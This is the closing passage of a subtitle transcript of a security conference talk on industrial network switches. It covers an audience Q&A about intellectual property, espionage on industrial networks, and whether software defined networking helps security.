  • 55:34 - 55:40
    the point is I tried to take that
    approach. I tried to say you have a
  • 55:40 - 55:43
    process in which you manufacture something
    and you make money by the fact that that
  • 55:43 - 55:48
    process is relatively secret. And if you
    don't care about defending your workers
  • 55:48 - 55:53
    from being damaged, then at least care
    about the intellectual property, because
  • 55:53 - 55:56
    I'll get security in by some sort of back
    door, right? I'm a little bit of a security
  • 55:56 - 56:00
    Machiavellian. I'll find a way to get
    security into the system somehow. So I
  • 56:00 - 56:05
    tried to say your intellectual property
    should be protected. And I found that they
  • 56:05 - 56:09
    didn't care so much. I mean, maybe you'll
    have more luck; maybe post-Stuxnet
  • 56:09 - 56:14
    that's a better argument. I hope you do.
    But it is an important question as well.
  • 56:14 - 56:19
    Right. It's not, it's not just potential
    for damage. I think there's a lot more
  • 56:19 - 56:25
    espionage going on on these networks than
    there is damage and sabotage.
    Herald: Okay,
  • 56:25 - 56:32
    we'll take one more question on mike four.
    Questioner: Thank you okay. My question
  • 56:32 - 56:38
    concerns the concepts of software defined
    networking and OpenFlow. So when I first
  • 56:38 - 56:45
    heard about software defined networking I
    thought well this is a huge security issue
  • 56:45 - 56:51
    and there may be huge vulnerabilities.
    After your joke I think this might
  • 56:51 - 56:56
    actually be a good idea to dumb down the
    switches and put the intelligence
  • 56:56 - 57:02
    somewhere locked up in a safe place.
    What's your opinion on that? Can they
  • 57:02 - 57:06
    actually improve security?
    Éireann: Yes. So the question is what role
  • 57:06 - 57:10
    could software defined networking play in
    these sorts of environments? And is it a
  • 57:10 - 57:15
    good idea from a security perspective?
    Anytime someone has a revolution in
  • 57:15 - 57:19
    computing we also have to update our
    security paradigm. So I think with
  • 57:19 - 57:23
    software defined networking it's not
    whether it's good or bad it's that you
  • 57:23 - 57:28
    defend that network differently than you
    defend one of these networks. So it's not
  • 57:28 - 57:31
    so much that it's good or bad; it's
    neutral if you know how to defend your
  • 57:31 - 57:35
    network. I don't care what it is. As long
    as someone is looking to defend it and
  • 57:35 - 57:39
    cares about how the flows are working. So
    I think software defined networking in
  • 57:39 - 57:42
    these environments could be a very good
    thing but the refresh rate on these
  • 57:42 - 57:46
    devices is not that high. So I don't think
    we'll see it there for a little while even
  • 57:46 - 57:51
    though it might be a good thing
    philosophically. It takes 5, 10, 15, 20 years
  • 57:51 - 57:56
    to refresh these networks so it'll be a little
    while. But it's not good or bad. It's just:
  • 57:56 - 58:00
    learn to defend what you've got. That's the
    problem, right?
  • 58:00 - 58:06
    Questioner: Okay thanks a lot.
    Herald: Okay okay let's give a big hand
  • 58:06 - 58:10
    for Éireann and thank you.
    Éireann: Thank you
  • 58:10 - 58:13
    applause
  • 58:13 - 58:24
    subtitles created by c3subtitles.de
    Join, and help us!
Title:
Eireann Leverett: Switches Get Stitches
Video Language:
English
Duration:
58:24